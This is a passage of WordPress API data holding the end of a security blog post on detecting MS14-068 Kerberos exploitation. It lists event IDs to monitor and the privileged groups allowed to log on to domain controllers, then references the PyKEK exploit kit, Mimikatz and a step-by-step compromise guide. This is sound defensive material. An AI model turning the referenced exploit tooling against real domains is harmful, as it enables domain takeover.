href=\"https:\/\/adsecurity.org\/wp-content\/uploads\/2014\/12\/Get-DCPatchStatus.txt\">Get-DCPatchStatus<\/a> (change file extension to .ps1)<\/li>\n<li>[<strong>UnPatched DCs]<\/strong> Monitor event ID 4672 for users who are not members of domain-level admin groups (<a href=\"https:\/\/adsecurity.org\/?p=272\">default groups able to logon to Domain Controllers<\/a> &#8211; this is why you shouldn&#8217;t use these default, built-in groups for delegation of administration):\n<ol>\n<li>Enterprise Admins (admin on all DCs in the forest),<\/li>\n<li>Domain Admins<\/li>\n<li>Administrators<\/li>\n<li>Server Admins<\/li>\n<li>Backup Operators<\/li>\n<li>Account Operators<\/li>\n<li>Print Operators<\/li>\n<li>Other groups delegated in your environment to logon to Domain Controllers<\/li>\n<\/ol>\n<\/li>\n<li><strong>[Patched DCs],<\/strong> monitor event id 4769 Kerberos Service Ticket Operation event which shows failed attempts to get Kerberos service tickets (TGS).<\/li>\n<\/ol>\n<p>&nbsp;<\/p>\n<h3><span style=\"text-decoration: underline;\"><strong>References:<\/strong><\/span><\/h3>\n<ul>\n<li><a href=\"https:\/\/adsecurity.org\/?p=660\">MS14-068 Kerberos Vulnerability Privilege Escalation POC Posted (PyKEK) <\/a><\/li>\n<li><a href=\"https:\/\/adsecurity.org\/?p=556\">Mimikatz and Active Directory Kerberos Attacks <\/a><\/li>\n<li><a href=\"https:\/\/adsecurity.org\/?p=574\">MS14-068: Active Directory Kerberos Vulnerability Patch for Invalid Checksum <\/a><\/li>\n<li><a href=\"https:\/\/adsecurity.org\/?p=541\">Kerberos Vulnerability in MS14-068 Explained <\/a><\/li>\n<li><a href=\"https:\/\/adsecurity.org\/?p=525\">MS14-068: Vulnerability in (Active Directory) Kerberos Could Allow Elevation of Privilege <\/a><\/li>\n<li>The Python script MS14-068 POC code: <a href=\"https:\/\/github.com\/bidord\/pykek\">Python Kerberos Exploitation Kit<\/a> (PyKEK)<\/li>\n<li><a href=\"http:\/\/blog.gentilkiwi.com\/\">Benjamin Delpy\u2019s blog<\/a> (<a href=\"https:\/\/translate.google.com\/translate?sl=fr&amp;tl=en&amp;js=y&amp;prev=_t&amp;hl=en&amp;ie=UTF-8&amp;u=http%3A%2F%2Fblog.gentilkiwi.com%2F&amp;edit-text=\">Google Translate English translated<\/a> version)<\/li>\n<li><a href=\"https:\/\/github.com\/gentilkiwi\/mimikatz\">Mimikatz GitHub repository<\/a><\/li>\n<li><a href=\"https:\/\/github.com\/gentilkiwi\/mimikatz\/wiki\">Mimikatz Github wiki<\/a><\/li>\n<li><a href=\"http:\/\/blog.gentilkiwi.com\/downloads\/mimikatz-rmll.pdf\">Mimikatz 2 Presentation Slides<\/a> (Benjamin Delpy, July 2014)<\/li>\n<li><a href=\"http:\/\/blog.gentilkiwi.com\/presentations\">All Mimikatz Presentation resources on blog.gentilkiwi.com<\/a><\/li>\n<li><a href=\"https:\/\/www.trustedsec.com\/december-2014\/ms14-068-full-compromise-step-step\/\">From MS14-068 to Full Compromise \u2013 Step by Step<\/a> [TrustedSec]<\/li>\n<\/ul>\n<p>&nbsp;<\/p>\n","protected":false},"excerpt":{"rendered":"<p>MS14-068 References: AD Kerberos Privilege Elevation Vulnerability: The Issue Detailed Explanation of MS14-068 MS14-068 Exploit POC with the Python Kerberos Exploitation Kit (aka PyKEK) Detecting PyKEK Kerberos Packets on the Wire aka How the MS14-068 Exploit Works After re-working my lab a bit, I set about testing the MS14-068 POC that Sylvain Monn\u00e9 posted to &hellip; <\/p>\n<p><a class=\"more-link btn\" href=\"https:\/\/adsecurity.org\/?p=676\">Continue reading<\/a><\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11,2],"tags":[20,380,101,59,337,80,81,331,298,207,295,334,333,697,332,22,329,330],"class_list":["post-676","post","type-post","status-publish","format-standard","hentry","category-microsoft-security","category-technical-reference","tag-activedirectory","tag-cve-2014-6324poc","tag-domaincontroller","tag-kalilinux","tag-kb3011780","tag-kdc","tag-kerberos","tag-kerberoschecksumvulnerability","tag-kerberoshacking","tag-mimikatz","tag-ms14068","tag-ms14068exploit","tag-ms14068exploitcode","tag-pac","tag-poc","tag-powershellcode","tag-pykek","tag-pythonkerberosexploitationkit","item-wrap"],"_links":{"self":[{"href":"https:\/\/adsecurity.org\/index.php?rest_route=\/wp\/v2\/posts\/676","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/adsecurity.org\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/adsecurity.org\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/adsecurity.org\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/adsecurity.org\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=676"}],"version-history":[{"count":49,"href":"https:\/\/adsecurity.org\/index.php?rest_route=\/wp\/v2\/posts\/676\/revisions"}],"predecessor-version":[{"id":2647,"href":"https:\/\/adsecurity.org\/index.php?rest_route=\/wp\/v2\/posts\/676\/revisions\/2647"}],"wp:attachment":[{"href":"https:\/\/adsecurity.org\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=676"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/adsecurity.org\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=676"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/adsecurity.org\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=676"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}